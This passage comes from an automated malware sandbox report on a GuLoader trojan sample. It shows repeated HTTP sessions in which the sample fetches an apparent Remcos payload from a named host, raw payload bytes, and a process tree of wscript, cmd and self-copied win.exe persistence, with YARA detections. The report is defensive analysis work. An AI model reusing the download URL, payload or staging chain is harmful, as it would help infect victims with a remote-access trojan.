1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c
                Data Ascii: P,\psc:4YYsb*D+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK |"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+*1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.649753192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                TimestampkBytes transferredDirectionData
                Jun 7, 2021 20:45:07.958627939 CEST3713OUTGET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:08.127895117 CEST3715INHTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream
                Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c
                Data Ascii: P,\psc:4YYsb*D+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK |"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+*1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.649754192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                TimestampkBytes transferredDirectionData
                Jun 7, 2021 20:45:08.057746887 CEST3713OUTGET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:08.229717016 CEST3728INHTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream
                Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c
                Data Ascii: P,\psc:4YYsb*D+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK |"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+*1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.649756192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                TimestampkBytes transferredDirectionData
                Jun 7, 2021 20:45:19.587258101 CEST3988OUTGET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:19.764909983 CEST3990INHTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:19 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream
                Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c
                Data Ascii: P,\psc:4YYsb*D+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK |"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+*1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 6696 Parent PID: 5924

                General

                Start time:20:42:34
                Start date:07/06/2021
                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 7080 Parent PID: 6696

                General

                Start time:20:43:01
                Start date:07/06/2021
                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: wscript.exe PID: 6480 Parent PID: 7080

                General

                Start time:20:43:38
                Start date:07/06/2021
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Imagebase:0xff0000
                File size:147456 bytes
                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: cmd.exe PID: 6884 Parent PID: 6480

                General

                Start time:20:43:41
                Start date:07/06/2021
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x2a0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: conhost.exe PID: 5700 Parent PID: 6884

                General

                Start time:20:43:41
                Start date:07/06/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff61de10000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: win.exe PID: 5128 Parent PID: 6884

                General

                Start time:20:43:42
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\win.exe
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 6%, ReversingLabs
                Reputation:low

                Analysis Process: win.exe PID: 5844 Parent PID: 3440

                General

                Start time:20:43:44
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: win.exe PID: 5852 Parent PID: 3440

                General

                Start time:20:43:52
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: win.exe PID: 5604 Parent PID: 5844

                General

                Start time:20:44:25
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
